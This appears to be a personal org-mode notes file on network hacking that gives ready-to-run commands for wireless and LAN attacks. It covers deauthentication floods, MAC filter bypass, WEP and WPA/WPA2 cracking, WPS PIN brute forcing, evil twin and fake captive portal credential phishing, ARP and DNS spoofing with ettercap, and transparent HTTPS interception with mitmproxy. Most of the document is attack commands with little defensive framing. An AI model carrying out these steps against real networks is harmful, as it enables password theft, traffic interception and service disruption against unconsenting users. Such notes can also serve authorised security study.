HackingNotes/NetworkHacking.org

Network Hacking

Preconnection Attacks

Wireless Modes (Managed & Monitor)

The wireless network interfaces can be listed by doing:

  iwconfig

If it's not available, wireless_tools must be installed.

To set the interface's mode to Monitor, we can do it by:

  ifconfig [interface_name] down
  sudo airmon-ng check kill # optional
  iwconfig [interface_name] mode monitor
  ifconfig [interface_name] up

Packet Sniffing

To sniff packets in networks around us, we can use airodump-ng, like this:

  airodump-ng [interface_name]

Wifi bands:
• *a*: 5Ghz
• b, *g*: 2.4 Ghz
• *n*: 5 and 2.4 Ghz
• *ac*: lower than 6 Ghz

By default, airodump sniffs on 2.4 Ghz. To specify a different band, we can run:

  airodump-ng --band [band(s)] [interface_name]

We can run it with several bands like:

  airodump-ng --band ab [interface_name]

We can run airodump against a single network like this:

  airodump-ng --bssid [network bssid] --channel [networks channel] [interface_name]

We can store the data of airodump to a file, using the write argument, followed by the name of the file.

Deauthentication attack

We can run a deauthentication attack running the following command:

  aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac] [interface]

If we specify 0 deauth packets, it'll run the attack indefinitely. If we are deauthenticating a client from a 5GHz network, we need to add the -D argument to the aireplay-ng command.

We can deauthenticate multiple clients by executing the commands in the background like this:

aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac1] [interface] &> /dev/null & aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac2] [interface] &> /dev/null & aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac3] [interface] &> /dev/null &

We can see all the jobs we have running on the background by executing jobs. And we can kill one process by doing kill %1, for example. Replacing the ~1~ with the job number.

To disconnect all the clients, we can run the following command:

  aireplay-ng --deauth [#deauth_packets] -a [network_mac] [interface]

The command is the same, the only difference is that we are not specifying a target with -c. Notice that airodump must be running against the target* *network. And also, the more devices we target, the less effective the attack will be.

Bypassing Mac Filtering

Routers can use mac filtering to allow/deny devices from connecting based on their MAC address. There are two implementations:

1. Using a blacklist to allow all MACs to connect, except the ones in a list
2. Using a whitelist to deny all MACs from connecting, except the ones in a
list.

To bypass a blacklist lal you have to do is to change the MAC address to a random MAC address.

To bypass a whitelist, we'll first run airodump-ng against that network, and set our MAC address to the one of any of the clients connected:

macchanger -m [mac_address] [interface_name]

Gaining Access

Discovering Hidden Networks

When a network is configured to be hidden, only the network name is hidden, all the other informatin is transmitted, and will appear in airodump-ng with an ESSID of <length: 0>. What we can do to get the name of a hidden network, is to run airodump-ng against it, and deauthenticate one of its clients, when the client connects back, the name of the network will be broadcasted into the air, and airodump-ng will capture it.

WEP

If we have a .cap file (which can be generated by airodump-ng) with enough Data packets, we can run aircrack-ng against it, to crack the WEP passkey:

  aircrack-ng [cap file]

If the network is not busy, it would take some time to capture enough data packets, we can force the AP to generate new packets.

First, we need to associate with the network:

  aireplay-ng --fakeauth 0 -a [target_mac] -h [network_interface_mac] [network_interface]

Note: For all these attacks we need to be associated with the network, so remember to run the fakeauth attack regularly.

ARP Request Reply Attack

When we are associated, we can force it to generate data packets like this:

  aireplay-ng --arpreplay -b [target_mac] -h [network_interface_mac] [network_interface]

Korek Chopchop Attack

This can be used when the network has no clients associated with it, or very low traffic:

  aireplay-ng --chopchop -b [target_mac] -h [network_interface_mac] [network_interface]

Once the keystream is saved into a file (it doesn't need to be 100% decrypted), we need to forge a fake packet using packetforge:

  packetforge-ng -0 -a [target_mac] -h [network_interface_mac] -k 255.255.255.255 -l 255.255.255.255 -y [xor_file] -w [output_filename]

Now we need to inject the packet into the traffic:

  aireplay-ng -2 -r [packet_filename] [network_interface]

Fragmentation Attack

We need to be close to the target for this attack, as we need to obtain 1500 bytes of PRGA.

  aireplay-ng --fragment -b [target_mac] -h [network_interface_mac] [network_interface]

Once the keystream is saved into a file, we need to forge a new packet:

  packetforge-ng -0 -a [target_mac] -h [network_interface_mac] -k 255.255.255.255 -l 255.255.255.255 -y [xor_file] -w [output_filename]

Now we need to inject the packet into the traffic:

  aireplay-ng -2 -r [packet_filename] [network_interface]

SKA WEP

Routers usually use OPN authentication, which means that anybody can associate with the network without knowing the key. When SKA (Shared Key Authentication) is used, we can only associate with the router if we know the key.

To crack this network, we can run an ARP Reply attack without associating, the only difference is that the attack will be executed with the MAC address of one of the connected clients, instead of the mac address of our network interface:

aireplay-ng --arpreplay -b [target_mac] -h [connected_client_mac] [network_interface]

WPA/WPA2

Without a wordlist (WPS)

To try to crack a WPA/WPA2 network without using a wordlist, we can exploit the WPS authentication system, if it's misconfigured.

We can get a list of networks with WPS enabled by executing:

  wash --interface [interface_name]

and to crack the network, we first need to associate with the network:

  aireplay-ng --fakeauth 30 -a [target_mac] -h [network_interface_mac] [network_interface]

and then, we can bruteforce the WPS pin:

  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv -A

Bypassing 0x2 and 0x3 errors

In case we get 0x3 and 0x4 errors in reaver, we can add the -N argument, to stop it from sending NACK messages, the end command would be like this:

  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -A -N

Bypassing WPS Lock

We exploit WPS by bruteforcing its pin, this means we try every possible pin, some routers lock after a number of failed attemps. The solution is to either reset the router, or to get the user to reset their router.

To reset the router, we can use mdk3. Mdk3 is a tool designed to exploit a number of weaknesses in 802.11 protocol, some of its exploits can cause the router to reset, and some routers unlock their WPS when they reset, so we can use MDK3 to remotely unlock locked routers. We can run the following command to run an authentication DoS mode:

mdk3 [interface_name] a -a [target_mac] -m

With a wordlist

First, we need to capture the handshake, to do that, we just need to run airodump-ng against our target network, and run a deauthentication attack to one of the clients connected to the network, so the handshake is captured.

We can generate a wordlist with crunch:

  crunch [min] [max] [characters] -o [output_file]

To run the bruteforce attack, we just need to run this command:

  aircrack-ng [cap_with_handshake] -w [wordlist_file]

Saving Progress

To save the progress of a cracking session, we'll use John The Ripper to display the wordlist. If we run:

john --wordlist=[wordlist_path] --stdout

The wordlist will be displayed in the standard output, and we can pipe it to aircrack-ng:

john --wordlist=[wordlist_path] --stdout | aircrack-ng -w - -b [network_bssid] [handshake_file]

John the ripper can be used to pause and resume sessions if we add the ~session~ argument:

john --wordlist=[wordlist_path] --stdout --session=[session_name] | aircrack-ng -w - -b [network_bssid] [handshake_file]

And then to resume, we'd execute the following command:

john --restore=[session_name] | aircrack-ng -w - -b [network_bssid] [handshake_file]

Using Huge Wordlists Without Wasting Storage

We can pipe the output of crunch directly to aircrack so that it doesn't waste storage:

crunch [min_len] [max_len] [characters] | aircrack-ng -b [bssid] -w - [handshake_file]

We can save, and restore the progress of the cracking progress using crunch, and john the ripper again:

crunch [min_len] [max_len] [characters] | john --stdin --session=[session_name] --stdout | aircrack-ng -w - -b [bssid] [handshake_file]

And to restore, we'd execute this command:

crunch [min_len] [max_len] [characters] | john --restore=[session_name] | aircrack-ng -w - -b [bssid] [handshake_file]

Using a Rainbow Table

Computing the PMK is what takes the longest time when cracking WPA/WPA2 networks using a wordlist, we can create a rainbow table, which is an especial wordlist that has the PMK already computed. We can do this while we are waiting for the handshake.

First, we'll create a new database:

  airolib-ng [database_name] --import passwd [wordlist_file]

Then, we'll import the ESSID to the database:

  echo "[ESSID]" > essid
  airolib-ng [database_name] --import essid essid

And finally, we'll convert each password in the list:

  airolib-ng [database_name] --batch

And to use it, we use aircrack-ng:

  aircrack-ng -r [database_name] [handshake_file]

Using the GPU

We can use hashcat to crack a key using the GPU. Hashcat does not support ~.cap~ files, so we need to convert it using an online tool made by the hashcat creators themselves.

And we can run hashcat like this:

  hashcat -I # to list the GPUs available to use for cracking
  hashcat -m 2500 -d [device_id] [hccapx_file] [wordlist]

Evil Twin Attack

For an evil twin attack we'll use Fluxion. Fluxion will:

• Start a fake AP with the same name as the target network
• Start a web server with a fake login page
• Disconnect all clients from this network
• Display the login page once a client connects to the fake AP
• Check the entered password, and make sure is the correct one

And to do all that, we just need to run fluxion and follow the steps.

Captive Portals

Captive portals are usually open networks with a login page.

There are a number of ways to bypass a captive portal:
1. Change MAC address to one of the connected clients.
2. Sniff logins in monitor mode
3. Connect and sniff logins after running an arp spoofing attack
4. Create a fake AP, ask users to login

Sniffing logins in monitor mode

Since captive portals are - usually - open networks, we don't use encryption, we can sniff data using airodump-ng, and then use wireshark to read this data including passwords.

If the login page is using HTTP instead of HTTPS, we can run a deauthentication attack, the user will be prompted to login again, and we can sniff the information.

In wireshark we can apply the http filter, and look for POST requests.

Sniffing captive portal login information using ARP Spoofing

Since captive portals are open, we can run to the target network without a password, we can run an arp spoofing attack, if we do so, clients will automatically lose their connection, and will be asked to login again, data sent to/from router including passwords will be sent to us.

mitmf --arp --spoof -i [interface_name] --gateway [gateway_ip_address]

Or we can use ettercap:

ettercap -Tq -M arp:remote -i [interface_name] /

Creating a fake captive portal

What we'll do is: we'll clone the login page used by the original captive portal, we'll create a fake AP with the same (or a similar) name, we'll deauth users to use the fake network with the cloned page, and sniff the login info.

To clone the login page of the captive portal, we just need to Ctrl+S it.

To create the captive portal we need to install hostapd, and dnsmasq. We need to first, flush iptables:

echo 1 | sudo tee -a /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -p FORWARD ACCEPT

We need a dnsmasq configuration file:

interface=[interface_name] dhcp-range=[ip_range_given_to_clients] dhcp-option=3,[gateway_ip_address] dhcp-option=6,[dns_server_address] address=/#/[address_to_redirect_to]

For example:

interface=wlan0 dhcp-range=10.0.0.10,10.0.0.100,8h dhcp-option=3,10.0.0.1 # computer ip address dhcp-option=6,10.0.0.1 address=/#/10.0.0.1

And we can run dnsmasq like this:

dnsmasq -C [config_file_location]

And we also need a configuration file for hostapd:

interface=[interface_name] ssid=[ssid] channel=[channel] driver=[driver]

For example:

interface=wlan0 ssid=wifi channel=1 driver=nl80211

And we have now to execute hostapd:

hostapd [config_file] -B

When hostapd is running, we must give an IP addres to our interface name, which in previous examples was wlan0:

ifconfig wlan0 10.0.0.1 netmask 255.255.255.0

And now, we can sniff the login information with wireshark.

WPA/WPA2 Enterprise

In WPA/WPA2 Enterprise all users must have an user and a password to connect to the network.

Post-Connection Attacks

Information gathering

Discovering devices connected to the same network

We can get all the clients connected to a network, using netdiscover like this:

  netdiscover -r [ip_range]

Ettercap

Ettercap is a tool for MITM attacks, it has a built-in sniffer, supports plugins for DNS Spoofing, support for custom filters, etc.

We can access and modify the configuration file of ettercap at ~/etc/ettercap/etter.conf~. What we need to modify in the config file is:

• remove the comments of the iptables lines in the redir_command_on/off section.
• set the beginning of the file's ec_uid, ec_gid to zero.

We can run ettercap like this:

ettercap -Tq /

In that command, -Tq is to tell ettercap to run in text mode, and to be quiet, and the three forward-slashes are so that we don't have to specify a target, but rather, to just execute the program.

ARP Spoofing

When ettercap is running we can press h to get some help, and we can also press l to get a list of all the hosts that ettercap has discovered. (quit)

We can run an arp spoofing attack like this with ettercap:

ettercap -Tq -M arp:remote -i [interface_name] -S [gateway_ip]/ [target_ip]/

After executing that command, if checked the arp table of the target device, it should've changed. The -S argument is not to generate self-signed SSL certificates.

Ettercap automatically starts a sniffer as well, whenever the user logs in to a website, or sends a request to a HTTP website, it'll be shown in ettercap.

To run a MITM attack against all clients, we can execute:

ettercap -Tq -M arp:remote -i [interface_name] -S /

Poisoning new clients

Ettercap has a number of plugins, some of them can be used to:
• Auto-add new clients -> autoadd
• Re-poison clients after arp broadcasts -> repoison_arp
• DNS spoof targets -> dns_spoof

We can activate a plugin by: pressing p, and entering the name of the plugin. The zero at the left of the plugin means that it's inactive, we can see the name, the version, and a description of what the plugin does.

If you are trying to target a whole subnet, you can activate the autoadd plugin, so new clients are arp spoofed as well.

DNS Spoofing

We can do a DNS spoofing attack using Ettercap. First, we need to open the file ~/etc/ettercap/etter.dns~, and we can add hosts there like:

bing.com A 192.168.1.11 *.bing.com A 192.168.1.11

If you want, you can also run ettercap like this, to immediately run a plugin:

ettercap -Tq -M arp:remote -i [interface_name] -S -P [plugin_name] /

Bypassing Router-side security

If a router implements some kind of security for ARP spoofing attacks, we can do a one-way ARP spoofing with Ettercap. We can do it executing the following command:

ettercap -Tq -M arp:oneway -i [interface_name] -S -P [plugin_name] [victim_ip]/ [router_ip]/

Sometimes, the sniffer of ettercap might not capture everything when running a one-way arp spoofing attack, to fix it, wireshark can be ran as the sniffer.

MITMproxy

MITMproxy can be used to intercept, analyse, modify, and replay packet flows, it supports a number of proxy modes, TLS cert generation, etc.

MITMproxy supports two modes:
1. Explicit: user connects directly to the proxy.
2. Transparent: data is redirected to the proxy.

If we execute mitmweb, it'll run mitmproxy in explicit mode, which means we'll need to connect our browser to the proxy so that we can analyse data flow.

In the search bar there are several characters we can input to get different results:

• ~a~: will display page assets (CSS, JS, Flash, etc.) We can do ~~a .js to
get only javascript files.
• ~m~: will filter by method, i.e. ~~m POST.
• ~~s~: will show only responses.
• ~~bs~: will filter based on the response body.

Another thing that can be done, is to intercept packets, to stop them from going to their destination, to modify them, and to send them again. In intercept we can use the same rules we can do with search, and highlight.

What we can do, is that we can add the intercept rule ~bs </body> and it will intercept all the pages that have a </body> tag to edit them.

If we are the man in the middle, we'll need to run the following command to route the traffic of our target(s) to mitmproxy:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

That command redirects all data from port 80, to port 8080 where Mitmproxy is running. And we also need to run mitmproxy in transparent mode:

mitmweb --mode transparent

When we are finished, we need to flush the iptables rules:

iptables -t nat --flush